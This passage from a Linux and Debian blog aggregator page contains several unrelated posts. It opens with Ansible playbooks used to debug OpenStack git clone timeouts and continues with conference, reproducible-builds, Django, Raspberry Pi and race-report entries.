We were originally cloning repositories via the git:// protocol. The debugging information was unfortunately limited and provided no useful diagnosis. Switching to https allowed for more CURL output (when using GIT_CURL_VERBVOSE=1 and GIT_TRACE=1) but this in itself just created noise. It actually took me a few days to remember that the servers are running arbitrary code anyway (a side effect of testing) and therefore cloning from the potentially insecure http protocol didn’t provide any further risk.

Over http we got a little more information, but still nothing that was conclusive at this point:

git clone -vvv http://git.openstack.org/openstack/nova .

error: RPC failed; result=18, HTTP code = 200
fatal: The remote end hung up unexpectedly
fatal: protocol error: bad pack header

After a bit it became more apparent that the problems would occur mostly during high (patch) traffic times. That is, when a lot of tests need to be queued. This lead me to think that either the network turbo-hipster was on was flaky when doing multiple git clones in parallel or the git servers were flaky. The lack of similar upstream failures lead me to initially think it was the former. In order to reproduce I decided to use Ansible to do multiple clones of repositories and see if that would uncover the problem. If needed I would have then extended this to orchestrating other parts of turbo-hipster in case the problem was systemic of something else.

Firstly I need to clone from a bunch of different servers at once to simulate the network failures more closely (rather than doing multiple clones on the one machine or from the one IP in containers for example). To simplify this I decided to learn some Ansible to launch a bunch of nodes on Rackspace (instead of doing it by hand).

Using the pyrax module I put together a crude playbook to launch a bunch of servers. There is likely much neater and better ways of doing this, but it suited my needs. The playbook takes care of placing appropriate sshkeys so I could continue to use them later.

    ---
    - name: Create VMs
      hosts: localhost
      vars:
        ssh_known_hosts_command: "ssh-keyscan -H -T 10"
        ssh_known_hosts_file: "/root/.ssh/known_hosts"
      tasks:
        - name: Provision a set of instances
          local_action:
            module: rax
            name: "josh-testing-ansible"
            flavor: "4"
            image: "Ubuntu 12.04 LTS (Precise Pangolin) (PVHVM)"
            region: "DFW"
            count: "15"
            group: "raxhosts"
            wait: yes
          register: raxcreate

        - name: Add the instances we created (by public IP) to the group 'raxhosts'
          local_action:
            module: add_host
            hostname: "{{ item.name }}"
            ansible_ssh_host: "{{ item.rax_accessipv4 }}"
            ansible_ssh_pass: "{{ item.rax_adminpass }}"
            groupname: raxhosts
          with_items: raxcreate.success
          when: raxcreate.action == 'create'

        - name: Sleep to give time for the instances to start ssh
          #there is almost certainly a better way of doing this
          pause: seconds=30

        - name: Scan the host key
          shell: "{{ ssh_known_hosts_command}} {{ item.rax_accessipv4 }} &gt;&gt; {{ ssh_known_hosts_file }}"
          with_items: raxcreate.success
          when: raxcreate.action == 'create'

    - name: Set up sshkeys
      hosts: raxhosts
      tasks:
       - name: Push root's pubkey
         authorized_key: user=root key="{{ lookup('file', '/root/.ssh/id_rsa.pub') }}"

From here I can use Ansible to work on those servers using the rax inventory. This allows me to address any nodes within my tenant and then log into them with the seeded sshkey.

The next step of course was to run tests. Firstly I just wanted to reproduce the issue, so in order to do that it would crudely set up an environment where it can simply clone nova multiple times.

    ---
    - name: Prepare servers for git testing
      hosts: josh-testing-ansible*
      serial: "100%"
      tasks:
        - name: Install git
          apt: name=git state=present update_cache=yes
        - name: remove nova if it is already cloned
          shell: 'rm -rf nova'

    - name: Clone nova and monitor tcpdump
      hosts: josh-testing-ansible*
      serial: "100%"
      tasks:
        - name: Clone nova
          shell: "git clone http://git.openstack.org/openstack/nova"

By default Ansible runs with 5 folked processes. Meaning that Ansible would work on 5 servers at a time. We want to exercise git heavily (in the same way turbo-hipster does) so we use the –forks param to run the clone on all the servers at once. The plan was to keep launching servers until the error reared its head from the load.

To my surprise this happened with very few nodes (less than 15, but I left that as my minimum testing). To confirm I also ran the tests after launching further nodes to see it fail at 50 and 100 concurrent clones. It turned out that the more I cloned the higher the failure rate percentage was.

Now that I had the problem reproducing, it was time to do some debugging. I modified the playbook to capture tcpdump information during the clone. Initially git was cloning over IPv6 so I turned that off on the nodes to force IPv4 (just in case it was a v6 issue, but the problem did present itself on both networks). I also locked git.openstack.org to one IP rather than randomly hitting both front ends.

    ---
    - name: Prepare servers for git testing
      hosts: josh-testing-ansible*
      serial: "100%"
      tasks:
        - name: Install git
          apt: name=git state=present update_cache=yes
        - name: remove nova if it is already cloned
          shell: 'rm -rf nova'

    - name: Clone nova and monitor tcpdump
      hosts: josh-testing-ansible*
      serial: "100%"
      vars:
        cap_file: tcpdump_{{ ansible_hostname }}_{{ ansible_date_time['epoch'] }}.cap
      tasks:
        - name: Disable ipv6 1/3
          sysctl: name="net.ipv6.conf.all.disable_ipv6" value=1 sysctl_set=yes
        - name: Disable ipv6 2/3
          sysctl: name="net.ipv6.conf.default.disable_ipv6" value=1 sysctl_set=yes
        - name: Disable ipv6 3/3
          sysctl: name="net.ipv6.conf.lo.disable_ipv6" value=1 sysctl_set=yes
        - name: Restart networking
          service: name=networking state=restarted
        - name: Lock git.o.o to one host
          lineinfile: dest=/etc/hosts line='23.253.252.15 git.openstack.org' state=present
        - name: start tcpdump
          command: "/usr/sbin/tcpdump -i eth0 -nnvvS -w /tmp/{{ cap_file }}"
          async: 6000000
          poll: 0 
        - name: Clone nova
          shell: "git clone http://git.openstack.org/openstack/nova"
          #shell: "git clone http://github.com/openstack/nova"
          ignore_errors: yes
        - name: kill tcpdump
          command: "/usr/bin/pkill tcpdump"
        - name: compress capture file
          command: "gzip {{ cap_file }} chdir=/tmp"
        - name: grab captured file
          fetch: src=/tmp/{{ cap_file }}.gz dest=/var/www/ flat=yes

This gave us a bunch of compressed capture files that I was then able to seek the help of my colleagues to debug (a particular thanks to Angus Lees). The results from an early run can be seen here: http://119.9.51.216/old/run1/

Gus determined that the problem was due to a RST packet coming from the source at roughly 60 seconds. This indicated it was likely we were hitting a timeout at the server or a firewall during the git-upload-pack of the clone.

The solution turned out to be rather straight forward. The git-upload-pack had simply grown too large and would timeout depending on the load on the servers. There was a timeout in apache as well as the HAProxy config for both frontend and backend responsiveness. The relative patches can be found at https://review.openstack.org/#/c/192490/ and https://review.openstack.org/#/c/192649/

While upping the timeout avoids the problem, certain projects are clearly pushing the infrastructure to its limits. As such a few changes were made by the infrastructure team (in particular James Blair) to improve git.openstack.org’s responsiveness.

Firstly git.openstack.org is now a higher performance (30GB) instance. This is a large step up from the previous (8GB) instances that were used as the frontend previously. Moving to one frontend additionally meant the HAProxy algorithm could be changed to leastconn to help balance connections better (https://review.openstack.org/#/c/193838/).

                          +--------------------+
                          | git.openstack.org  |
                          | (HAProxy frontend) |
                          +----------+---------+
                                     |
                                     |
            +------------------------v------------------------+
            |  +---------------------+  (leastconn algorithm) |
            |  | git01.openstack.org |                        |
            |  |   +---------------------+                    |
            |  +---| git02.openstack.org |                    |
            |      |   +---------------------+                |
            |      +---| git03.openstack.org |                |
            |          |   +---------------------+            |
            |          +---| git04.openstack.org |            |
            |              |   +---------------------+        |
            |              +---| git05.openstack.org |        |
            |                  |  (HAProxy backend)  |        |
            |                  +---------------------+        |
            +-------------------------------------------------+

All that was left was to see if things had improved. I rerun the test across 15, 30 and then 45 servers. These were all able to clone nova reliably where they had previously been failing. I then upped it to 100 servers where the cloning began to fail again.

Post-fix logs for those interested:
http://119.9.51.216/run15/
http://119.9.51.216/run30/
http://119.9.51.216/run45/
http://119.9.51.216/run100/
http://119.9.51.216/run15per100/

At this point, however, I’m basically performing a Distributed Denial of Service attack against git. As such, while the servers aren’t immune to a DDoS the problem appears to be fixed.

Planet Linux AustraliaMichael Still: Potato Point

I went to Potato Point with the Scouts for a weekend wide game. Very nice location, apart from the ticks!

                                       

See more thumbnails

Tags for this post: blog pictures 20160523 photo coast scouts bushwalk
Related posts: Exploring the Jagungal; Scout activity: orienteering at Mount Stranger

Comment

,

Planet Linux AustraliaRichard Jones: PyCon Australia 2016: Registration Opens!

We are delighted to announce that online registration is now open for PyCon Australia 2016. The seventh PyCon Australia is being held in Melbourne, Victoria from August 12th – 16th at the Melbourne Convention and Exhibition Centre, will draw hundreds of Python developers, enthusiasts and students from Australasia and afar.

Starting today, early bird offers are up for grabs. To take advantage of these discounted ticket rates, be among the first 90 to register. Early bird registration starts from $60 for full-time students, $190 for enthusiasts and $495 for professionals. Offers this good won’t last long, so register right away.

We strongly encourage attendees to organise their accommodation as early as possible, as demand for cheaper rooms is very strong during the AFL season.

PyCon Australia has endeavoured to keep tickets as affordable as possible. Financial assistance is also available: for information about eligibility, head to our financial assistance page and apply. We are able to make such offers thanks to our Sponsors and Contributors.

To begin the registration process, and find out more about each level of ticket, visit our registration information page.

Important Dates to Help You Plan

  • 22 May: Registration opens - ‘Early bird’ prices for the first 90 tickets
  • 17 June: Last day to apply for financial assistance
  • 26 June: Last day to purchase conference dinner tickets
  • 9 July: Last day to order conference t-shirts
  • 12 August: PyCon Australia 2016 begins!

About PyCon Australia

PyCon Australia is the national conference for the Python programming community. The seventh PyCon Australia will be held on August 12-16 2016 in Melbourne, bringing together professional, student and enthusiast developers with a love for programming in Python. PyCon Australia informs the country’s developers with presentations by experts and core developers of Python, as well as the libraries and frameworks that they rely on.

To find out more about PyCon Australia 2016, visit our website at pycon-au.org, follow us at @pyconau or e-mail us at contact@pycon-au.org.

PyCon Australia is presented by Linux Australia (www.linux.org.au) and acknowledges the support of our Platinum Sponsors, DevDemand.co and IRESS; and our Gold sponsors, Google Australia and Optiver. For full details of our sponsors, see our website.

Planet DebianReproducible builds folks: Reproducible builds: week 56 in Stretch cycle

What happened in the Reproducible Builds effort between May 15th and May 21st 2016:

Media coverage

Blog posts from our GSoC and Outreachy contributors:

Documentation update

Ximin Luo clarified instructions on how to set SOURCE_DATE_EPOCH.

Toolchain fixes

  • Joao Eriberto Mota Filho uploaded txt2man/1.5.6-4, which honours SOURCE_DATE_EPOCH to generate reproducible manpages (original patch by Reiner Herrmann).
  • Dmitry Shachnev uploaded sphinx/1.4.1-1 to experimental with improved support for SOURCE_DATE_EPOCH (original patch by Alexis Bienvenüe).
  • Emmanuel Bourg submitted a patch against debhelper to use a fixed username while building ant packages.

Other upstream fixes

  • Doxygen merged a patch by Ximin Luo, which uses UTC as timezone for embedded timestamps.
  • CMake applied a patch by Reiner Herrmann in their next branch, which sorts file lists obtained with file(GLOB).
  • GNU tar 1.29 with support for --clamp-mtime has been released upstream, closing #816072, which was the blocker for #759886 "dpkg-dev: please make mtimes of packaged files deterministic" which we now hope will be closed soon.

Packages fixed

The following 18 packages have become reproducible due to changes in their build dependencies: abiword angband apt-listbugs asn1c bacula-doc bittornado cdbackup fenix gap-autpgrp gerbv jboss-logging-tools invokebinder modplugtools objenesis pmw r-cran-rniftilib x-loader zsnes

The following packages have become reproducible after being fixed:

Some uploads have fixed some reproducibility issues, but not all of them:

  • bzr/2.7.0-6 by Jelmer Vernooij.
  • libsdl2/2.0.4+dfsg2-1 by Manuel A. Fernandez Montecelo.
  • pvm/3.4.5-13 by James Clarke.
  • refpolicy/2:2.20140421-11 by Laurent Bigonville.
  • subvertpy/0.9.3-4 by Jelmer Vernooij.

Patches submitted that have not made their way to the archive yet:

  • #824413 against binutils by Chris Lamb: filter build user and date from test log case-insensitively
  • #824452 against python-certbot by Chris Lamb: prevent PID from being embedded into documentation (forwarded upstream)
  • #824453 against gtk-gnutella by Chris Lamb: use SOURCE_DATE_EPOCH for deterministic timestamp (merged upstream)
  • #824454 against python-latexcodec by Chris Lamb: fix for parsing the changelog date
  • #824472 against torch3 by Alexis Bienvenüe: sort object files while linking
  • #824501 against cclive by Alexis Bienvenüe: use SOURCE_DATE_EPOCH as embedded build date
  • #824567 against tkdesk by Alexis Bienvenüe: sort order of files which are parsed by mkindex script
  • #824592 against twitter-bootstrap by Alexis Bienvenüe: use shell-independent printing
  • #824639 against openblas by Alexis Bienvenüe: sort object files while linking
  • #824653 against elkcode by Alexis Bienvenüe: sort list of files locale-independently
  • #824668 against gmt by Alexis Bienvenüe: use SOURCE_DATE_EPOCH for embedded timestamp (similar patch by Bas Couwenberg already applied and forwarded upstream)
  • #824808 against gdal by Alexis Bienvenüe: sort object files while linking
  • #824951 against libtomcrypt by Reiner Herrmann: use SOURCE_DATE_EPOCH for timestamp embedded into metadata

Reproducibility-related bugs filed:

  • #824420 against python-phply by ceridwen: parsetab.py file is not included when building with DEB_BUILD_OPTIONS="nocheck"
  • #824572 against dpkg-dev by XImin Luo: request to export SOURCE_DATE_EPOCH in /usr/share/dpkg/*.mk.

Package reviews

51 reviews have been added, 19 have been updated and 15 have been removed in this week.

22 FTBFS bugs have been reported by Chris Lamb, Santiago Vila, Niko Tyni and Daniel Schepler.

tests.reproducible-builds.org

Misc.

  • During the discussion on debian-devel about PIE, an archive rebuild was suggested by Bálint Réczey, and Holger Levsen suggested to coordinate this with a required archive rebuild for reproducible builds.
  • Ximin Luo improved misc.git/reports (=the tools to help writing the weekly statistics for this blog) quite a bit, h01ger contributed a little too.

This week's edition was written by Reiner Herrmann and Holger Levsen and reviewed by a bunch of Reproducible builds folks on IRC.

Planet DebianAntonio Terceiro: Adopting pristine-tar

As of yesterday, I am the new maintainer of pristine-tar. As it is the case for most of Joey Hess’ creations, it is an extremely useful tool, and used in a very large number of Debian packages which are maintained in git.

My first upload was most of a terrain recognition nature: I did some housekeeping tasks, such as making the build idempotent and making sure all binaries are built with security hardening flags, and wrote a few automated test cases to serve as build-time and run-time regression test suite. No functional changes have been made.

As Joey explained when he orphaned it, there are a few technical challenges involved in making sure pristine-tar stays useful in the future. Although I did read some of the code, I am not particularly familiar with the internals yet, and will be more than happy to get co-maintainers. If you are interested, please get in touch. The source git repository is right there.

Planet Linux AustraliaDanielle Madeley: Django and PostgreSQL composite types

PostgreSQL has this nifty feature called composite types that you can use to create your own types from the built-in PostgreSQL types. It’s a bit like hstore, only structured, which makes it great for structured data that you might reuse multiple times in a model, like addresses.

Unfortunately to date, they were pretty much a pain to use in Django. There were some older implementations for versions of Django before 1.7, but they tended to do things like create surprise new objects in the namespace, not be migrateable, and require connection to the DB at any time (i.e. during your build).

Anyway, after reading a bunch of their implementations and then the Django source code I wrote django-postgres-composite-types.

Install with:

pip install django-postgres-composite-types

Then you can define a composite type declaratively:

from django.db import models
from postgres_composite_type import CompositeType


class Address(CompositeType):
    """An address."""

    address_1 = models.CharField(max_length=255)
    address_2 = models.CharField(max_length=255)

    suburb = models.CharField(max_length=50)
    state = models.CharField(max_length=50)

    postcode = models.CharField(max_length=10)
    country = models.CharField(max_length=50)

    class Meta:
        db_type = 'x_address'  # Required

And use it in a model:

class Person(models.Model):
    """A person."""

    address = Address.Field()

The field should provide all of the things you need, including formfield etc and you can even inherit this field to extend it in your own way:

class AddressField(Address.Field):
    def __init__(self, in_australia=True, **kwargs):
        self.in_australia = in_australia

        super().__init__(**kwargs)

Finally to set up the DB there is a migration operation that will create the type that you can add:

import address
from django.db import migrations


class Migration(migrations.Migration):

    operations = [
        # Registers the type
        address.Address.Operation(),
        migrations.AddField(
            model_name='person',
            name='address',
            field=address.Address.Field(blank=True, null=True),
        ),
    ]

It’s not smart enough to add it itself (can you do that?). Nor would it be smart enough to write the operations to alter a type. That would be a pretty cool trick. But it’s useful functionality all the same, especially when the alternative is creating lots of 1:1 models that are hard to work with and hard to garbage collect.

It’s still pretty early days, so the APIs are subject to change. PRs accepted of course.

,

Planet Linux AustraliaMaxim Zakharov: Restoring gitstats

gitstats tool has stopped working on our project after upgrade to Ubuntu 16.04. Finally I have got time to have a look. There were two issues with it:

  1. we do not need to use process wait as process communicate waits until process termination and the last process in the pipeline do not finish until all processes before it in the pipeline terminate, plus process wait may deadlock on pipes with huge output, see notice at https://docs.python.org/2/library/subprocess.html
  2. On Ubuntu 16.04 grep has started to give "Binary file (standard input) matches" notice into the pipe which breaks parsing.

I have made a pull request which fixes this issue: https://github.com/hoxu/gitstats/pull/65
Also you can clone fixed version from my account: https://github.com/Maxime2/gitstats

Planet DebianPetter Reinholdtsen: French edition of Lawrence Lessigs book Cultura Libre on Amazon and Barnes & Noble

A few weeks ago the French paperback edition of Lawrence Lessigs 2004 book Cultura Libre was published. Today I noticed that the book is now available from book stores. You can now buy it from Amazon ($19.99), Barnes & Noble ($?) and as always from Lulu.com ($19.99). The revenue is donated to the Creative Commons project. If you buy from Lulu.com, they currently get $10.59, while if you buy from one of the book stores most of the revenue go to the book store and the Creative Commons project get much (not sure how much less).

I was a bit surprised to discover that there is a kindle edition sold by Amazon Digital Services LLC on Amazon. Not quite sure how that edition was created, but if you want to download a electronic edition (PDF, EPUB, Mobi) generated from the same files used to create the paperback edition, they are available from github.

,

Sociological ImagesIs the “Mrs. Degree” Dead?

TSP_Assigned_pbk_978-0-393-28445-4Assigned: Life with Gender is a new anthology featuring blog posts by a wide range of sociologists writing at The Society Pages and elsewhere. To celebrate, we’re re-posting four of the essays as this month’s “flashback Fridays.” Enjoy! And to learn more about this anthology, a companion to Wade and Ferree’s Gender: Ideas, Interactions, Institutions, please click here.

.

Is the “Mrs. Degree” Dead?, by Laura Hamilton, PhD

In 1998 I was a first-year student at DePauw University, a small liberal arts college in Indiana. A floor-mate of mine, with whom I hung out occasionally, told me over lunch that she was at college primarily to find a “good husband.” I nearly choked on my sandwich. I had assumed that the notion of the “Mrs. Degree” was a relic of my parents’ era—if not my grandparents’. Surely it had gone the way of the home economics major and women’s dormitory curfews.

8435526776_b47fb121c5_z
Photo via clemsonunivlibrary flickr creative commons

Years later, I — along with my co-director, Elizabeth A. Armstrong — would embark on a five year ethnographic and longitudinal study of a dormitory floor of women at a public flagship in the Midwest. As part of my dissertation, I also interviewed the women’s parents. What I found brought me back to my first year of college. A subset of parents wanted their daughters to be “cookie-baking moms”—not successful lawyers, doctors, or businesswomen. They espoused gender complementarity—a cultural model of how women should achieve economic security that relied on a co-constructed pairing of traditional femininity and masculinity. That is, men were to be economic providers and women supportive homemakers. This was a revised “Mrs.” Degree, in the sense that marriage during college, or even right after, was not desirable. College women were to build the traits and social networks that would hopefully land them a successful husband eventually, but it was assumed best to wait until men had proven themselves in the labor market before entering a marriage.

This was not the only cultural model to which women on the floor were exposed. In fact, those coming in primed for complementarity were in the minority. However, as I show in my article, “The Revised MRS: Gender Complementarity at College,” far more women left college leaning toward gender complementarity than their previous gender socialization suggested. Something was happening on the college campus — where women were, ironically, out-achieving men — that shifted them toward performing an affluent, white, and heterosexual femininity, marked by an emphasis on appearance, accommodation to men, and a bubbly personality.

I argue that gender complementarity is not just a characteristic of individual women, but is actually encouraged by the institutional and interactional features of the typical, four-year, public state school. Midwest U, like other schools of its kind, builds a social and academic infrastructure well-suited to high-paying, out-of-state students interested in partying. The predominately white Greek system — a historically gender-, class-, and racially-segregated institution — enjoys prominence on campus. An array of “easy” majors, geared toward characteristics developed outside of the classroom, allow women to leverage personality, looks, and social skills in the academic sphere. These supports make it possible for peer cultures in which gender complementarity is paramount to thrive. Women who want to belong and make friends find it hard — if not impossible — to avoid the influence of the dominant social scene on campus, located in fraternities and Greek-oriented bars.

This structure of campus life is not incidental. In recent years, cuts to state and federal support for higher education have led mid-tier public institutions like Midwest U to cater to the socially-oriented and out-of-state students who arrive with gender complementarity interests. These class-based processes have implications for the type of social and academic climate that all students find upon arriving at Midwest University.

The problem is, however, that most women need to accrue the skills and credentials that translate into a solid career. An institution supporting gender complementarity does them a serious disservice — potentially contributing to gendered differences in pay after college. The situation is particularly problematic for students not from the richest of families: Affluent women espousing complementarity form the type of networks that give them reasonable hope of rescue by a high-credentialed spouse, and heavy parental support means that they can afford to be in big cities where they mix and mingle with the “right” men. Women from less affluent backgrounds lack these resources, and are often reliant on their own human capital to make it after college.

The gradual shift from higher education as a public good — funded heavily by the state — to a private commodity — for sale to the highest bidder — has significantly stalled not only progress toward class equality, but certain forms of gender equality as well. Change is going to require unlinking the solvency of organizations like Midwest U from the interests of those can afford, and thus demand, an exclusionary and highly gendered social experience.

Laura T. Hamilton, PhD is an assistant professor of sociology at the University of California, Merced. Her recently published article, “The Revised MRS: Gender Complementarity at College,” appears in the April 2014 issue of Gender & Society; this post originally appeared at their blog. She is the author of Parenting to a Degree: How Family Matter’s for College Women’s Success and, with Elizabeth Armstrong, Paying for the Party: How Colleges Maintain Inequality.

(View original at https://thesocietypages.org/socimages)

Planet DebianZlatan Todorić: 4 months of work turned into GNOME, Debian testing based tablet

Huh, where do I start. I started working for a great CEO and great company known as Purism. What is so great about it? First of all, CEO (Todd Weaver), is incredible passionate about Free software. Yes, you read it correctly. Free software. Not Open Source definition, but Free software definition. I want to repeat this like a mantra. In Purism we try to integrate high-end hardware with Free software. Not only that, we want our hardware to be Free as much as possible. No, we want to make it entirely Free but at the moment we don't achieve that. So instead going the way of using older hardware (as Ministry of Freedom does, and kudos to them for making such option available), we sacrifice this bit for the momentum we hope to gain - that brings growth and growth brings us much better position when we sit at negotiation table with hardware producers. If negotiations even fail, with growth we will have enough chances to heavily invest in things such as openRISC or freeing cellular modules. We want to provide in future entirely Free hardware&software device that has integrated security and privacy focus while it is easy to use and convenient as any other mainstream OS. And we choose to currently sacrifice few things to stay in loop.

Surely that can't be the only thing - and it isn't. Our current hardware runs entirely on Free software. You can install Debian main on it and all will work out of box. I know I did this and enjoy my Debian more than ever. We also have margin share program where part of profit we donate to Free software projects. We are also discussing a lot of new business model where our community will get a lot of influence (stay tuned for this). Besides all this, our OS (called PureOS - yes, a bit misfortune that we took the name of dormant distribution), was Trisquel based but now it is Debian testing based. Current PureOS 2.0 is coming with default DE as Cinnamom but we are already baking PureOS 3.0 which is going to come with GNOME Shell as default.

Why is this important? Well, around 12 hours ago we launched a tablet campaign on Indiegogo which comes with GNOME Shell and PureOS as default. Not one, but two tablets actually (although we heavily focus on 11" one). This is the product of mine 4 months dedicated work at Purism. I must give kudos to all Purism members that pushed their parts in preparation for this campaign. It was hell of a ride.

Librem11

I have also approached (of course!) Debian for creation of OEM installations ISOs for our Librem products. This way, with every sold Librem that ships with Debian preinstalled, Debian will get donation. It is our way to show gratitude to Debian for all the work our community does (yes, I am still extremely proud Debian dude and I will stay like that!). Oh yes, I am the chief technology person at Purism, and besides all goals we have, I also plan (dream) about Purism being the company that has highest number of Debian Developers. In that terms I am very proud to say that Matthias Klumpp became part of Purism. Hopefully we soon extend the number of Debian population in Purism.

Of course, I think it is fairly known that I am easy to approach so if anyone has any questions (as I didn't want this post to be too long) feel free to contact me. Also - in Free software spirit - we welcome any community engagement, suggestion and/or feedback.

Worse Than FailureError'd: Errord in Time and Space

Anonymous went to configure some settings and found his options were a little constrained.

A prompt that warns you to choose any value between 8 and 8

Fortunately, real numbers are a contniuum, so Anonymous has an infinite number of possible values to choose from.

Kaylee was poking through a codebase and found this DLL, which leaves us with so many questions.

A code base with one DLL marked 'ExternalWeb.InternalExternal'

We’re left feeling inside out, and perhaps a bit unmoored in time…

We’re losing track of time… how old are we? Benji found that question far more difficult to answer than normal…

A drop-down list with options like '25-25', '25-35'

Then again, it’s hard not to lose track of time. Time and space are a continuum, and movements through space are also movements through time, and vice versa. Ricardo sends us this Italain train schedule:

A train schedule where the 'km' field has been formatted as dates instead of numbers

If you don’t read Italian, pay close attention to the ‘km’ field- which is measured in dates, apparently.

As we all learned in Back to the Future III, trains are incredibly useful devices for time travel. As any time traveler knows, representing dates and times when you’re crossing history is a challenge. Nick stepped aboard the wrong train, and who knows when he might be now?

An animated image where the message '2015 NOV 97 86::3PM' scrolls across a train's LED display

This all gets so confusing. Is there some sort of error code we could report about all of this? Larry, do you have anything? Oh, you do?

A FoxPro error 'Fatal Error 104 when trying to report error 104'

[Advertisement] BuildMaster integrates with an ever-growing list of tools to automate and facilitate everything from continuous integration to database change scripts to production deployments. Interested? Learn more about BuildMaster!

Planet Linux AustraliaGlen Turner: Heatsink for RPi3

I ordered a passive heatsink for system-on-chip of the Raspberry Pi 3 model B. Since it fits well I'll share the details:

Order

  • Fischer Elektronik ICK S 14 X 14 X 10 heatsink (Element 14 catalogue 1850054, AUD3.70).

  • Fischer Elektronik WLFT 404 23X23 thermally conductive foil, adhesive (Element 14 catalogue 1211707, AUD2.42 ).

Install

To install you need these parts: two lint-free isopropyl alcohol swabs; and these tools: sharp craft knife, a anti-static wrist strap.

Prepare the heatsink: Swab the base of the heatsink. Wait for it to dry. Remove the firm clear plastic from the thermal foil, taking care not to get fingerprints in the centre of the exposed sticky side. Put the foil on the bench, sticky side up. Plonk the heatsink base onto the sticky side, rolling slightly to avoid air bubbles and then pressing hard. Trim around the edges of the heatsink with the craft knife.

Prepare the Raspberry Pi 3 system-on-chip: Unlug everything from the RPi3, turn off the power, wait a bit, plug the USB power lead back in but don't reapply power (this gives us a ground reference). If the RPi3 is in a case, just remove the lid. Attach wrist strap and clamp to ethernet port surround or some other convenient ground. Swab the largest of the chips on the board, ensuring no lint remains.

Attach heat sink: Remove the plastic protection from the thermal foil, exposing the other sticky side. Do not touch the sticky side. With care place the heatsink squarely and snuggly on the chip. Press down firmly with finger of grounded hand for a few seconds. Don't press too hard: we're just ensuring the glue binds.

Is it worth it?

This little passive heatsink won't stop the RPi3 from throttling under sustained full load, despite this being one of the more effective passive heatsinks on the market. You'll need a fan blowing air across the heatsink to prevent that happening, and you might well need a heatsink on the RAM too.

But the days of CPUs being able to run at full rate continuously are numbered. Throttling the CPU performance under load is common in phones and tablets, and is not rare in laptops.

What the heatsink allows is for a delay to the moment of throttling. So a peaky load can have more chance of not causing throttling. Since we're only talking AUD7.12 in parts a passive heatsink is worth it if you are going to use the RPi3 for serious purposes.

Of course the heatsink is also a more effective radiator. When running cpuburn-a53 the CPU core temperature stabilises at 80C with a CPU clock of 700MHz (out of 1200MHz). It's plain that 80C is the target core temperature for this version of the RPi3's firmware. That's some 400MHz higher than without the heatsink. But if your task needs sustained raw CPU performance then you are much better off with even the cheapest of desktops, let alone a server.

Planet Linux AustraliaSteven Hanley: [mtb/events] UTA100 - The big dance through the blue mountains again

Back at Ultra Trail Australia running through the Blue Mountains wilderness

I am still fascinated by seeing how I can improve in this event, after running in pairs twice and now solo twice I signed up to come back this year still seeing how much time I can lop off my lap of the course. Though I continually claim I am not a runner with my mountain biking and adventure racing background I have been getting out on foot a lot since I got into doing this event. With an arbitrary number I apply to the time around this course before I may admit I am a runner of 12 hours I as coming back to see how close to this goal I would get.

My first year solo in 2014 I was positive I would finish just now sure how fast, thinking on the day I may take around 15 hours I managed 13:44 which at the time had me happy and a little surprised. In 2015 I had a few things interrupt my lead up and not everything felt great so though I hoped to go under 13 hours I was not sure, managing 13:15 was not what I wanted but I got around the loop again anyway.

In 2016 I continued to not have a training program and simply work toward goals by judging effort in my head and race schedule leading up to the event. However most running science seems to suggest the more you can run without getting injured the better. So on January 1st 2016 I kicked off a running streak to see how long it would last. I managed to run every day in 2016 until Wednesday before UTA100, so 132 days in a row with a minimum distance of 5km. This included the days before and after efforts such as the razorback ultra in Victoria and the Six Foot Track marathon in the Blue Mountains.

I never really managed to get much speed work into my prep again this year however had definitely upped my volume doing between 70 and 125km every week of the year with most of it on trails with some good altitude gain at times. I also remained un injured and able to run every day which was great, even with the odd fall or problem I could work around and keep moving through I was feeling good before the event. Due to my tendency to waste time at the check points on course I also had my sister here to support me this year so I would be able to run into CP 3, 4 and 5. Grab new bottles, have food shoved at me and head on out.

All was looking fairly good and I was sure I could go under 13 hours this year the question remained how far under I could get. Then Wednesday night before the race I got home feeling awful and shivering and needed to crawl into bed early and get sleep, waking up Thursday I felt worse if possible and was worried it was all over I had gotten sick and nothing would help. I left work at 2pm that day and headed home to sleep the rest of the day. Fortunately by the time I woke on Friday morning I no longer felt so awful, and actually felt I may be able to run the next day. I had stopped my running streak on Wednesday, no real need to continue it and feeling so bad for two days definitely had to stop.

I arrived Friday afternoon, spent money with Graham and Hanny in their store for some stuff I needed from Find Your Feet and headed to the briefing. The welcome to country form David King was once again a highlight of the runners briefing it is a fantastic part of the race every year and really heart felt, genuine and funny. Met my sister Jane at our accommodation and discussed the race day and estimated times while eating dinner. Fortunately I finally felt ready to run again by the time I went to sleep Friday night. I had a few runs the week before with what I call Happy Legs where you feel awesome running and light and happy on your feet. Though I hoped for that on Saturday I knew I just had to get out on the track and keep moving well.

I was in wave 1 and starting at 6:20am, had a chat with my mate Tom Reeve on the start line and then we got moving, taking it easy on the 5km bitumen loop I had a chat with Phil Whitten who was worried after stomach issues in six foot caused him problems he may have issues today too (in the end he did alas), still it was nice to be moving and cruising along the out and back before the steps. In wave 1 it was nice and open and even the descent down Furber steps was pretty open. Ran through toward the golden stairs feeling OK, never awesome but not like it was going to be a horrible day out.

I got onto the fire road out Narrow Neck and realised I was probably a few beats higher than I probably should be HR wise however decided to stay with it and ensure I not push too hard on the hills climbs along here. With the start out and back slightly extended this year it was good to pass through CP1 in the same time as last year so on course for slightly faster, however I would not have a proper idea of time ad how I was going until Dunphys camp. On the climb from Cedar gap I noticed some people around me seemed to be pushing harder than I thought they should however that had nothing to do with me so I kept moving and hoping I survived. On the descent down to the camp I had my left adductor cramp a bit which seems to happen here every year so I have to manage it and keep going.

At Dunphys CP I had a chat to Myf happy to actually see her or Matt this year (I missed seeing them here last year) and got moving aware I would need to take it easy on iron pot to keep the cramps at bay. I got onto Iron Pot and loved being able to say thanks to David King and his colleagues welcoming us to country with Didgeridoo and clap sticks up there, the short out and back made it easier this year and then I took it really easy on the loose ski slope sort of descent down due to cramps being close to the surface. Continued taking it easy chatting with other runners as we went back past the outgoing track on our right and then we dropped down to the bottom of the valley to start heading up Megalong Rd.

Looking at my watch I was probably behind time to do sub 12 hours already at this point but would have a much better idea once I got to Six Foot CP in a little while. I took it easy climbing the rd at strong power walk and then managed a comfortable 4 to 5 minute pace along the road into the CP. I got out of CP3 just before the 5 hour mark, this was confirming I was unlikely to go under 12 hours, I expected I needed to be gone from here in 4h40m to manage sub 12 knowing how I was feeling. I grabbed some risotto and baked potatoes with salt from Jane to see if I could eat these for some variety rather than sweet crap while climbing to Katoomba. On the way into the CP I passed Etienne who had an injury so asked her to see if he needed help when he got in (though that made it harder for her to get to e in time at Katoomba, fortunately Etienne had his parents there to help him out when he had to withdraw there)

